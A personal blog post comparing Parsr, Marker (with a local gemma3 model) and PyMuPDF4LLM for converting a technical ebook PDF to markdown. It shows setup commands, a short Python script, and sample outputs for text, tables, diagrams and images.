<p>It turns out PDFs are surprisingly complex - they often aren’t linear documents at all, they are very display/print oriented - and things that appear simple, like tables, are actually just text in positions that look table-like.  Ditto columnar text or any other fiddly layout.  And of course every technical PDF is full of diagrams.</p>

<p>This post won’t go into all the complexities - I’m no expert and this was more a fun “how do I get the data I want?” question than something I put a lot of time into.</p>

<p>But it boils down to - you can do this the easy way, and get poor (but maybe good enough?) results - or the hard way and get great results, very slowly (or maybe expensively).</p>

<p>I should note I’m only really dealing with PDFs that are digital-native - documents like technical books that are mostly text. A lot of the tools are full of OCR logic because a lot of older PDFs have scanned images of pages.  OCR is still needed for newer PDFs, as there is often text in graphical elements that is relevant - but it’s not as essential.</p>

<h2 id="what-did-i-try">What did I try?</h2>

<h3 id="parsr">Parsr</h3>

<p>I started with <a href="https://github.com/axa-group/Parsr">Parsr</a> from AXA Group (of all people! I knew some AXA folks in Melbourne back in the day). This is a quite complex document parsing toolkit that runs in a Docker container, and is pretty old - pre-LLM - I’m not quite sure why I tried this in hindsight; it got a lot of google hits I guess, and is a good example of what parsing PDFs was like before generative AI.</p>

<p>I ran Parsr via docker and the web UI - it was pretty straightforward:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">-p</span> 3001:3001 axarev/parsr
docker run <span class="nt">-t</span> <span class="nt">-p</span> 8080:80 axarev/parsr-ui-localhost:latest
</code></pre></div></div>

<p>I didn’t record how long this took - it was slow, but nowhere near as slow as Marker (below).</p>

<p>The output … wasn’t great.  Just looking at it, it had obvious problems like chopping letters off the start of paragraphs.  Colour me unimpressed.</p>

<h3 id="marker">Marker</h3>

<p>Next I tried <a href="https://github.com/datalab-to/marker">Marker</a>, which is a lot more modern, and quite complex and powerful.  It had the nice feature of being able to plug in an LLM, including free ollama LLMs, to do the complex interpretation of things like images and tables.</p>

<p>I won’t go through all the ollama setup, but the gist of what I ran was:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uv init <span class="c"># setting up a local uv project</span>
uv add torch torchvision
uv add marker-pdf

uv run marker_single my_pdf_file.pdf <span class="se">\</span>
    <span class="nt">--use_llm</span> <span class="se">\</span>
    <span class="nt">--llm_service</span> marker.services.ollama.OllamaService <span class="se">\</span>
    <span class="nt">--ollama_base_url</span> http://localhost:11434 <span class="se">\</span>
    <span class="nt">--ollama_model</span> gemma3 <span class="se">\</span>
    <span class="nt">--output_dir</span> my_pdf_file <span class="se">\</span>
    <span class="nt">--output_format</span> markdown <span class="se">\</span>
    <span class="nt">--disable_image_extraction</span>
</code></pre></div></div>

<p>This took <em>forever</em>!  And it was very slow to show progress, and logs were minimal.  For quite a while I assumed it had crashed, and gave up and used Python (see below) - but I went back and tried again, and realised it <em>was</em> working - but glacially slowly.  I left it running overnight - the eventual time to process a 12MB technical ebook was 15 hours!!!</p>

<p>It’s quite possible this was due to the limitations of free LLMs.  I used the gemma3 model, I want to try other models that might be faster; but having spent 15 hours waiting, I’m not in a rush to benchmark others.</p>

<p>It’s probably a <em>lot</em> faster to use a paid LLM, sadly my Claude Code license seems to come with severe rate limits for the underlying Anthropic APIs, so I couldn’t really try that.</p>

<p>The output, however, was great.  More on that later.</p>

<p><strong>UPDATE</strong> I tried a different model - the new <a href="https://ollama.com/library/gemma3n">gemma3n model</a> “for efficient execution on everyday devices” - and it was drastically faster.  Under 3 minutes. So there must have been some massive bottleneck using gemma3?  But - the gemma3n output had some major flaws - hallucinations in tables, for instance!  I need to investigate this more when I have time.</p>
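<p>One cheap way to flag possible hallucinations, offered purely as an untested idea rather than anything done for this post, is to compare the LLM-assisted markdown against a plain, non-LLM extraction of the same pages and list any words that only the LLM version contains. The function names below are hypothetical:</p>

```python
import re


def words(text):
    """Lower-case alphanumeric tokens found in the text."""
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def unsupported_words(llm_markdown, baseline_text):
    """Tokens the LLM output contains that the baseline never saw."""
    return sorted(words(llm_markdown) - words(baseline_text))


if __name__ == "__main__":
    baseline = "GET Read a customer"
    llm_output = "| GET | Read a customer record |"
    print(unsupported_words(llm_output, baseline))
```

<p>This would only ever be a first-pass filter: it produces false positives wherever the two tools disagree for innocent reasons (a ligature read as “frst” by one and “first” by the other, say), and it can’t spot real words that have been moved into the wrong table cell.</p>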

<h3 id="pymypdf">PyMuPDF</h3>

<p>Finally, I tried a Python library - a bit of digging suggested <a href="https://pymupdf.readthedocs.io/">PyMuPDF</a>, which is very popular and has a specific <a href="https://pymupdf.readthedocs.io/en/latest/pymupdf4llm/index.html">PyMuPDF4LLM</a> package for LLM use.</p>

<p>I wrote (well, Claude mostly wrote) a very simple script:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env -S uv run
# /// script
# requires-python = "&gt;=3.8"
# dependencies = [
#     "pymupdf4llm",
# ]
# ///
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">pathlib</span>
<span class="kn">import</span> <span class="nn">pymupdf4llm</span>

<span class="k">def</span> <span class="nf">convert_pdf_to_markdown</span><span class="p">(</span><span class="n">pdf_path</span><span class="p">,</span> <span class="n">output_path</span><span class="p">):</span>
    <span class="n">md_text</span> <span class="o">=</span> <span class="n">pymupdf4llm</span><span class="p">.</span><span class="n">to_markdown</span><span class="p">(</span><span class="n">pdf_path</span><span class="p">)</span>
    <span class="n">pathlib</span><span class="p">.</span><span class="n">Path</span><span class="p">(</span><span class="n">output_path</span><span class="p">).</span><span class="n">write_bytes</span><span class="p">(</span><span class="n">md_text</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="k">return</span> <span class="n">output_path</span>


<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">pdf_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">output_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
    <span class="n">convert_pdf_to_markdown</span><span class="p">(</span><span class="n">pdf_file</span><span class="p">,</span> <span class="n">output_file</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>(Claude’s script had more logging and error checking, I’ve trimmed it down for this blog)</p>

<p>This was very fast by comparison with the others - the same 12MB file took 28 seconds to convert!</p>

<p>The output wasn’t <em>great</em> - but it was probably fine for LLM summaries, if you don’t mind losing some sense of the content of tables, and skipping images almost entirely.</p>

<h2 id="what-did-i-use-as-a-test-document">What did I use as a test document?</h2>

<p>I used <a href="https://www.goodreads.com/book/show/38396693-the-design-of-web-apis">“The Design of Web APIs” by Arnaud Lauret</a> as my test document. The choice was somewhat random - I had it in my ebook collection, and it seemed like a good mix of text, diagrams, code samples, and tables that would test the various parsing tools.</p>

<p>The PDF was 12MB in size, with 396 pages and a nice mix of text, diagrams, code snippets and tables.</p>

<h2 id="output-comparison">Output comparison</h2>

<h3 id="basic-text">Basic text</h3>

<p>Basic text shouldn’t be too hard, you’d think.  Here is a sample from the ebook:</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-text-comparison.png" alt="PDF text parsing comparison" /></p>

<p><strong>Parsr</strong> handled this relatively OK, but it didn’t handle words split by a line ending at all well:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people do when they shop online? Well, they buy some products. And how do they buy these products? They add them to their shopping cart and then check out. Nothing new for these two frst questions. Let’s now dig into each step to determine its inputs and outputs.  
We’ll start with the add products to the cart goal. What do people need to add a prod- uct to a cart? They obviously need a product and a cart. Good, and do they get some- thing in return when they add a product to their cart? No. Well, these new questions do not seem to give us any really useful information; the answers are quite obvious. Maybe we will get something more interesting for the check out step  
</code></pre></div></div>

<p>Also, it couldn’t read the word “first”! “Nothing new for these two frst questions” - I guess “first” was using a ligature that the parser didn’t understand?</p>

<p><strong>PyMuPDF</strong> and <strong>Marker</strong> both handled hyphenated words at line endings successfully - but both also stumbled on “frst”.</p>

<p>(I won’t include samples as they are basically the same as the above, but with “product” and “something” as single words)</p>
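<p>For output like Parsr’s, the split words could in principle be patched up afterwards. This is a minimal sketch, assuming the breaks always appear as a hyphen followed by a single space, as in the sample above; the function name and the regular expression are illustrative, not taken from any of the tools:</p>

```python
import re

# A word fragment, a hyphen, a single space, then a lower-case fragment:
# the shape left behind when a word was hyphenated at a line end.
SPLIT_WORD = re.compile(r"\b([A-Za-z]+)- ([a-z]+)\b")


def join_split_words(text):
    """Rejoin words that were hyphenated across a line break."""
    return SPLIT_WORD.sub(r"\1\2", text)


if __name__ == "__main__":
    print(join_split_words("What do people need to add a prod- uct to a cart?"))
```

<p>It leaves ordinary hyphenated words like “black-and-white” alone because they have no space after the hyphen, but it would wrongly glue together a phrase like “pre- and post-processing”, so it’s a heuristic at best. It also does nothing for the missing ligature in “frst”.</p>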

<h3 id="code-snippets">Code snippets</h3>

<p>All the tools did a decent job of recognising code snippets - I think they tend to be in a monospace font which makes recognising them easier.</p>

<h3 id="tables">Tables</h3>

<p>Tables are fiddly as they aren’t stored as tabular info in the pdf, just as text with positions:</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-table-comparison.png" alt="PDF table parsing comparison" /></p>

<p><strong>Parsr</strong> didn’t cope well with the row separation:</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT in creation) GET PATCH/PUT DELETE</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post, send a message to customer service, subscribe to a service, sign a contract, open a bank account, upload a photo, share a status on a social network, and so on Read a customer, search for a French restaurant, find new friends, retrieve opened accounts for the last 3 months, download a signed contract, filter best selling books, select black-and-white photos, list friends, and so forth Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery method, change an order’s currency, modify a debit card limit, temporarily block a credit card, and so on Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and so on</td>
    </tr>
  </tbody>
</table>

<p><strong>Marker</strong> did much better:</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT<br />in creation)</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,<br />send a message to customer service, subscribe to a service, sign a contract, open a bank<br />account, upload a photo, share a status on a social network, and so on</td>
    </tr>
    <tr>
      <td>GET</td>
      <td>Read a customer, search for a French restaurant, find new friends, retrieve opened<br />accounts for the last 3 months, download a signed contract, filter best selling books,<br />select black-and-white photos, list friends, and so forth</td>
    </tr>
    <tr>
      <td>PATCH/PUT</td>
      <td>Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery<br />method, change an order’s currency, modify a debit card limit, temporarily block a credit<br />card, and so on</td>
    </tr>
    <tr>
      <td>DELETE</td>
      <td>Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and<br />so on</td>
    </tr>
  </tbody>
</table>

<p><strong>PyMuPDF</strong> was similar to Parsr:</p>

<table>
  <thead>
    <tr>
      <th>HTTP method</th>
      <th>Action</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>POST (and PUT<br />in creation)<br />GET<br />PATCH/PUT<br />DELETE</td>
      <td>Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,<br />send a message to customer service, subscribe to a service, sign a contract, open a bank<br />account, upload a photo, share a status on a social network, and so on<br />Read a customer, search for a French restaurant, fnd new friends, retrieve opened<br />accounts for the last 3 months, download a signed contract, flter best selling books,<br />select black-and-white photos, list friends, and so forth<br />Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery<br />method, change an order’s currency, modify a debit card limit, temporarily block a credit<br />card, and so on<br />Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and<br />so on</td>
    </tr>
  </tbody>
</table>
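<p>The PyMuPDF output above also shows the dropped “fi” ligature again (“fnd”, “flter”). A rough sketch of how this could be patched up after extraction is below. It is not something any of these tools do, as far as I know: the <code class="language-plaintext highlighter-rouge">repair_word</code> and <code class="language-plaintext highlighter-rouge">repair_text</code> helpers and the tiny <code class="language-plaintext highlighter-rouge">VOCAB</code> word list are made up for illustration, and a real version would need a proper dictionary.</p>

```python
import re

# Ligatures that PDF fonts commonly encode as a single glyph. In the samples
# above only the leading "f" survived, so we try putting each one back.
LIGATURES = ("fi", "fl", "ff", "ffi", "ffl")


def repair_word(word, vocabulary):
    """Return a repaired spelling of word, or word unchanged if unsure."""
    lower = word.lower()
    if lower in vocabulary or "f" not in lower:
        return word
    candidates = set()
    for index, char in enumerate(lower):
        if char != "f":
            continue
        for ligature in LIGATURES:
            candidate = lower[:index] + ligature + lower[index + 1:]
            if candidate in vocabulary:
                candidates.add(candidate)
    # Only repair when exactly one known word matches; otherwise leave it.
    if len(candidates) != 1:
        return word
    fixed = candidates.pop()
    return fixed.capitalize() if word[0].isupper() else fixed


def repair_text(text, vocabulary):
    """Apply repair_word to every alphabetic word in text."""
    return re.sub(r"[A-Za-z]+", lambda m: repair_word(m.group(0), vocabulary), text)


# Hypothetical word list, just big enough for the sample from the table.
VOCAB = {"find", "filter", "first", "new", "friends", "best", "selling", "books"}

print(repair_text("fnd new friends, flter best selling books", VOCAB))
```

<p>Words that are already known, or that have no single unambiguous repair, are left alone, so a sketch like this should err on the side of doing nothing.</p>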

<h3 id="images">Images</h3>

<p>Images, it turns out, get processed in a few different ways, depending on both the content and the tool. <strong>Parsr</strong> was configured to generate markdown with images, so it sometimes tried to interpret images and sometimes just copied them. This makes some sense: if the image is actually a table, you’d prefer it to be turned into markdown.</p>

<p><strong>PyMuPDF</strong>, by contrast, didn’t really have any explicit handling for images - it would just try to parse them as text. <strong>Marker</strong>, run with the <code class="language-plaintext highlighter-rouge">--disable_image_extraction</code> parameter, tried to replace images with descriptions if they weren’t otherwise identifiable.</p>

<p>I’ll split images into a few key types as they get handled quite differently:</p>

<h4 id="diagrams">Diagrams</h4>

<p>Diagrams have text and boxes in them - the results were a bit of a mixed bag.</p>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-diagram-comparison.png" alt="PDF diagram parsing comparison" /></p>

<p><strong>Parsr</strong> tried to just turn it into text, and didn’t do so well - but it’s still better than the others in this case:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people want to do when they

How do people use an oven?

heat food?

They heat food  
Heat food They want to  
at?a given power  
at power heat food!  
for a given duration.  
for duration

Whats Hows Goals

Investigate what is done and how it is done...  
...to identify goals
</code></pre></div></div>

<p><strong>Marker</strong> actually failed to process this one at all.  In other cases it did OK with text descriptions, but never great.  This was possibly a limitation of the free LLM it used.</p>

<p><strong>PyMuPDF</strong> also did pretty badly:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What do people

Investigate what is done and how it is done... ...to identify goals
</code></pre></div></div>

<p>Interestingly, I asked <strong>Claude Code</strong> to process this same image into a mermaid.js snippet - it’d be very cool to have a PDF parser that could do this, when appropriate:</p>

<pre><code class="language-mermaid">flowchart TB
    %% Speech bubbles (using stadium shape as approximation)
    Q1("What do people&lt;br/&gt;want to do when they&lt;br/&gt;use an oven?")
    Q2("How do people&lt;br/&gt;heat food?")
    
    %% White boxes
    W1[They want to&lt;br/&gt;heat food!]
    W2[They heat food&lt;br/&gt;at a given power&lt;br/&gt;for a given duration.]
    
    %% Black box (goal)
    G[Heat food&lt;br/&gt;at power&lt;br/&gt;for duration]:::goal
    
    %% Bottom boxes
    Whats[Whats]
    Hows[Hows]
    Goals[Goals]:::goal
    
    %% Connections
    Q1 --&gt; W1
    Q2 --&gt; W2
    W2 --&gt; G
    
    %% Bottom flow
    Whats --&gt; Hows --&gt; Goals
    
    %% Vertical connections (dashed)
    W1 -.-&gt; Whats
    W2 -.-&gt; Hows
    G -.-&gt; Goals
    
    %% Bottom labels (using invisible nodes for positioning)
    subgraph bottom [" "]
        direction LR
        inv1[Investigate what is done and how it is done...]:::invisible
        inv2[...to identify goals]:::invisible
    end
    
    %% Styling
    classDef goal fill:#000,color:#fff
    classDef invisible fill:transparent,stroke:none
    
    %% Hide subgraph box
    style bottom fill:transparent,stroke:none
</code></pre>
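<p>To make the “parser that could do this” idea a bit more concrete, here is a minimal sketch of the easy half: turning already-detected boxes and arrows into a Mermaid flowchart. Everything here is hypothetical - the <code class="language-plaintext highlighter-rouge">Box</code> and <code class="language-plaintext highlighter-rouge">Arrow</code> types and the <code class="language-plaintext highlighter-rouge">to_mermaid</code> function are invented for illustration, and the hard part (detecting the boxes and arrows in the image) is assumed to have happened elsewhere.</p>

```python
from dataclasses import dataclass


@dataclass
class Box:
    """A detected box: a short identifier plus the text found inside it."""
    node_id: str
    label: str


@dataclass
class Arrow:
    """A detected connection between two boxes."""
    source: str
    target: str
    dashed: bool = False


def to_mermaid(boxes, arrows, direction="TB"):
    """Render boxes and arrows as Mermaid flowchart source."""
    lines = ["flowchart " + direction]
    for box in boxes:
        # Quote the label so punctuation is safe; swap out inner double quotes.
        label = box.label.replace('"', "'")
        lines.append('    {}["{}"]'.format(box.node_id, label))
    for arrow in arrows:
        link = "-.->" if arrow.dashed else "-->"
        lines.append("    {} {} {}".format(arrow.source, link, arrow.target))
    return "\n".join(lines)


# A hand-written fragment of the oven diagram, standing in for real detection.
boxes = [
    Box("Q2", "How do people heat food?"),
    Box("W2", "They heat food at a given power for a given duration."),
    Box("G", "Heat food at power for duration"),
]
arrows = [Arrow("Q2", "W2"), Arrow("W2", "G"), Arrow("G", "Q2", dashed=True)]

print(to_mermaid(boxes, arrows))
```

<p>This skips everything Claude Code did around styling and layout, but it shows that the output side is simple once the structure is known.</p>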

<h4 id="screenshots">Screenshots</h4>

<p><img src="/assets/images/2025-07-06-pdf-parsing/pdf-screenshot-comparison.png" alt="PDF screenshot parsing comparison" /></p>

<p><strong>Parsr</strong> just saved this as an image - probably the best option for a mixed markdown-and-images output.</p>

<p><strong>Marker</strong> made a table - this is a decent effort, though given the limitations of markdown tables it couldn’t really make it work. You can also see the limitations of OCR on small text:</p>

<table>
  <thead>
    <tr>
      <th>Q Search</th>
      <th>Create a money transfer</th>
      <th> </th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Authentication</td>
      <td>This operation allows one to transfer an amount of money from a source account to a destination account. There are three different types of</td>
      <td> </td>
    </tr>
    <tr>
      <td>Transfers<br />$\checkmark$</td>
      <td>money transfer:<br />• Immediate – these are executed as soon as the request is received</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>POST</b> Create a money transfer</td>
      <td>• Delaved - these are executed upon a given future date<br />· Recurring - these are executed a given occurrences number of times at a given frequency - the first occurrence being executed immediately</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>COL</b> List money transfers</td>
      <td>or at a given date</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>CIT</b> Get a money transfer</td>
      <td>BankingAPIScopes (transfericreate, transferiadmin)<br /><b>AUTHORIZATIONS</b></td>
      <td> </td>
    </tr>
    <tr>
      <td>Cancel a money transfer</td>
      <td>REQUEST BODY SCHEMA: application/json</td>
      <td> </td>
    </tr>
    <tr>
      <td><b>Beneficiaries</b></td>
      <td>string 15 characters /^\d{15}$/<br />source<br />required<br />Source account number</td>
      <td> </td>
    </tr>
    <tr>
      <td>Accounts</td>
      <td>destination<br />string 15 characters /^\d{15}$/<br />required<br />Destination account number</td>
      <td> </td>
    </tr>
  </tbody>
</table>

<p><strong>PyMuPDF</strong>, unsurprisingly, didn’t even try with this one.</p>

<h4 id="photos">Photos</h4>

<p><img src="/assets/images/2025-07-06-pdf-parsing/Arnaud%20Lauret.png" alt="Arnaud Lauret" /></p>

<p><strong>Parsr</strong> naturally just saved this as an image.</p>

<p><strong>Marker</strong> did … poorly:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Image /page/22/Picture/1 description: A bar chart titled "Fruit Preference Survey" is shown. The x-axis shows the types of fruits, and the y-axis shows the number of people. The bar chart shows that most people prefer apples, followed by bananas and oranges. 20 people prefer apples, 15 people prefer bananas, and 10 people prefer oranges.
</code></pre></div></div>

<p>I guess the LLM misinterpreted the books and turned them into a bar chart hallucination? Not so good, gemma3 model.</p>

<p><strong>PyMuPDF</strong> didn’t even try to handle the image.</p>

<p><strong>Claude Code</strong>, by comparison, did a great job - so Marker with a commercial LLM would probably produce something similar:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>This is a photo of a man with glasses and a beard, wearing a dark blue
  t-shirt with "RESPECT API GUIDELINES" text on it. He's standing in front
  of a white bookshelf filled with technical books and what appears to be
  board games. The person appears to be in a home office or study setting.
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>

<p>This was a kind-of fun digression.  I think it’s pretty clear though that I have basically two (or three?) options here:</p>

<ol>
  <li>If I just want an LLM to summarize an ebook that is mostly text, PyMuPDF is <em>fine</em>.  It’s fast, easy, and there’s enough context for it to work with.</li>
  <li>If I want a full markdown version of an ebook, for detailed analysis or copying sections to Obsidian or something, it’d be worth using Marker - though maybe not with the “images as descriptions” setting.
    <ul>
      <li>Using a free ollama LLM can be fine if I have lots of time, don’t mind some spurious descriptions, and can fiddle with models and run times (this needs investigation).</li>
      <li>But maybe if I wanted something higher quality, it’d be worth using it with a commercial LLM.</li>
    </ul>
  </li>
</ol>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="llm" /><category term="pdf" /><category term="tools" /><category term="claude" /><summary type="html"><![CDATA[I had a shower thought the other day - “I’m an ebook hoarder, I have a bunch of technical ebooks as mobi/epub files, but also pdfs. It’d be nice to be able to slurp them up into LLM tools - for summarizing, for categorising and the rest”. I’d already done epubs (see my recent Stonemouth analysis) so PDFs should be not too hard? It turns out PDFs are surprisingly complex - they often aren’t linear documents at all, they are very display/print oriented - and things that appear simple like tables are actually just text in positions that looks table-like. Ditto columnar text or any other fiddly layout. And of course every technical PDF is full of diagrams. This post won’t go into all the complexities - I’m no expert and this was more a fun “how do I get the data I want?” question than something I put a lot of time into. But it boils down to - you can do this the easy way, and get poor (but maybe good enough?) results - or the hard way and get great results, very slowly (or maybe expensively) I should note I’m only really dealing with PDFs that are digital-native - documents like technical books that are mostly text. A lot of the tools are full of OCR logic because a lot of older PDFs have scanned images of pages. OCR is still needed for newer PDFs, as there is often text in graphical elements that is relevant - but it’s not as essential. What did I try? Parsr I started with Parsr from AXA Group (of all people! I knew some AXA folks in Melbourne back in the day). This is a quite complex document parsing toolkit that runs in a Docker container, and is pretty old - pre-LLM - I’m not quite sure why I tried this in hindsight; it got a lot of google hits I guess, and is a good example of what parsing PDFs was like before generative AI. 
I ran Parsr via docker and the web UI - it was pretty straightforward: docker run -p 3001:3001 axarev/parsr docker run -t -p 8080:80 axarev/parsr-ui-localhost:latest I didn’t record how long this took, but it was slow, but nothing as slow as Marker (below). The output … wasn’t great. Just looking at it, it had obvious problems like chopping letters off the start of paragraphs. Colour me unimpressed. Marker Next I tried Marker, which is a lot more modern, and quite complex and powerful. It had the nice feature of being able to plug in an LLM, including free ollama LLMs, to do the complex interpretation of things like images and tables. I won’t go through all the ollama setup, but the gist of what I ran was: uv init # setting up a local uv project uv add torch torchvision uv add marker-pdf uv run marker_single my_pdf_file.pdf \ --use_llm \ --llm_service marker.services.ollama.OllamaService \ --ollama_base_url http://localhost:11434 \ --ollama_model gemma3 \ --output_dir my_pdf_file \ --output_format markdown \ --disable_image_extraction This took forever ! And it was very slow to show progress, and logs were minimal. For quite a while I assumed it had crashed, and gave up and used Python (see below) - but I went back and tried again, and realised it was working - but glacially slowly. I left it running overnight - the eventual time to process a 12MB technical ebook was 15 hours!!! It’s quite possible this was due to the limitations of free LLMs. I used the gemma3 model, I want to try other models that might be faster; but having spent 15 hours waiting, I’m not in a rush to benchmark others. It’s probably a lot faster to use a paid LLM, sadly my Claude Code license seems to come with severe rate limits for the underlying Anthropic APIs, so I couldn’t really try that. The output, however, was great. More on that later UPDATE I tried a different model - the new gemma3n model “for efficient execution on everyday devices” - and it was drastically faster. Under 3 minutes. 
So there must have been some massive bottleneck using gemma3? But - the gemma3n output had some major flaws - hallucinations in tables, for instance! I need to investigate this more when I have time. PyMyPDF Finally, I tried a Python library - a bit of digging suggested PyMuPDF which is very popular and has a specific PyMyPDF4LLM model for LLM use. I wrote (well, Claude mostly wrote) a very simple script: #!/usr/bin/env -S uv run # /// script # requires-python = "&gt;=3.8" # dependencies = [ # "pymupdf4llm", # ] # /// import sys import pathlib import pymupdf4llm def convert_pdf_to_markdown(pdf_path, output_path): md_text = pymupdf4llm.to_markdown(pdf_path) pathlib.Path(output_path).write_bytes(md_text.encode()) return output_path def main(): pdf_file = sys.argv[1] output_file = sys.argv[2] convert_pdf_to_markdown(pdf_file, output_file) if __name__ == "__main__": main() (Claude’s script had more logging and error checking, I’ve trimmed it down for this blog) This was very fast by comparison with the others - the same 12MB file took 28 seconds to convert! The output wasn’t great - but it was probably fine for LLM summaries, if you don’t mind losing some sense of the content of tables, and skipping images almost entirely. What did I use as a test document? I used “The Design of Web APIs” by Arnaud Lauret as my test document. The choice was somewhat random - I had it in my ebook collection, and it seemed like a good mix of text, diagrams, code samples, and tables that would test the various parsing tools. The PDF was 12MB in size, with 396 pages and a nice mix of text, diagrams, code snippets and tables. Output comparison Basic text Basic text shouldn’t be too hard, you’d think. Here is a sample from the ebook: Parsr handled this relatively OK, but it didn’t handle words split by a line ending at all well: What do people do when they shop online? Well, they buy some products. And how do they buy these products? They add them to their shopping cart and then check out. 
Nothing new for these two frst questions. Let’s now dig into each step to determine its inputs and outputs. We’ll start with the add products to the cart goal. What do people need to add a prod- uct to a cart? They obviously need a product and a cart. Good, and do they get some- thing in return when they add a product to their cart? No. Well, these new questions do not seem to give us any really useful information; the answers are quite obvious. Maybe we will get something more interesting for the check out step Also, it couldn’t read the word “first”! “Nothing new for these two frst questions” - I guess “first” was using a ligature that the parser didn’t understand? PyMyPdf and Marker both handled hyphenated words at line endings successfully - but both also stumbled on “frst”. (I won’t include samples as they are basically the same as the above, but with “product” and “something” as single words) Code snippets All the tools did a decent job of recognising code snippets - I think they tend to be in a monospace font which makes recognising them easier. 
Tables Tables are fiddly as they aren’t stored as tabular info in the pdf, just as text with positions: Parsr didn’t cope well with the row separation: HTTP method Action POST (and PUT in creation) GET PATCH/PUT DELETE Create a customer, add a meal to a menu, order goods, start a timer, save a blog post, send a message to customer service, subscribe to a service, sign a contract, open a bank account, upload a photo, share a status on a social network, and so on Read a customer, search for a French restaurant, find new friends, retrieve opened accounts for the last 3 months, download a signed contract, filter best selling books, select black-and-white photos, list friends, and so forth Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery method, change an order’s currency, modify a debit card limit, temporarily block a credit card, and so on Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and so on Marker did much better: HTTP method Action POST (and PUTin creation) Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,send a message to customer service, subscribe to a service, sign a contract, open a bankaccount, upload a photo, share a status on a social network, and so on GET Read a customer, search for a French restaurant, find new friends, retrieve openedaccounts for the last 3 months, download a signed contract, filter best selling books,select black-and-white photos, list friends, and so forth PATCH/PUT Update a customer, replace goods in an order, switch plane seat, edit an order’s deliverymethod, change an order’s currency, modify a debit card limit, temporarily block a creditcard, and so on DELETE Delete a customer, cancel an order, close a case, terminate a process, stop a timer, andso on PyMyPdf was similar to Parsr HTTP method Action POST (and PUTin creation)GETPATCH/PUTDELETE Create a customer, add a meal to a menu, order goods, start a timer, save 
a blog post,send a message to customer service, subscribe to a service, sign a contract, open a bankaccount, upload a photo, share a status on a social network, and so onRead a customer, search for a French restaurant, fnd new friends, retrieve openedaccounts for the last 3 months, download a signed contract, flter best selling books,select black-and-white photos, list friends, and so forthUpdate a customer, replace goods in an order, switch plane seat, edit an order’s deliverymethod, change an order’s currency, modify a debit card limit, temporarily block a creditcard, and so onDelete a customer, cancel an order, close a case, terminate a process, stop a timer, andso on Images Images it turns out seem to get processed in a few ways depending on the content; and also the tools. Parsr was configured to generate markdown with images, so it sometimes tried to interpret images, and sometimes just copied them - this makes some sense, as if the image is actually a table you’d prefer it to be turned into markdown. Whereas PyMyPdf didn’t really have any explicit handling for images, it would just try to parse them as text; and Marker with the --disable_image_extraction parameter tried to replace images with descriptions if they weren’t otherwise identifiable. I’ll split images into a few key types as they get handled quite differently: Diagrams Diagrams have text and boxes in them - the results were a bit of a mixed bag. Parsr tried to just turn it into text, and didn’t do so well - but it’s still better than the others in this case: What do people want to do when they How do people use an oven? heat food? They heat food Heat food They want to at?a given power at power heat food! for a given duration. for duration Whats Hows Goals Investigate what is done and how it is done... ...to identify goals Marker actually failed to process this one at all. In other cases it did OK with text descriptions, but never great. This was possibly a limitation of the free LLM it used. 
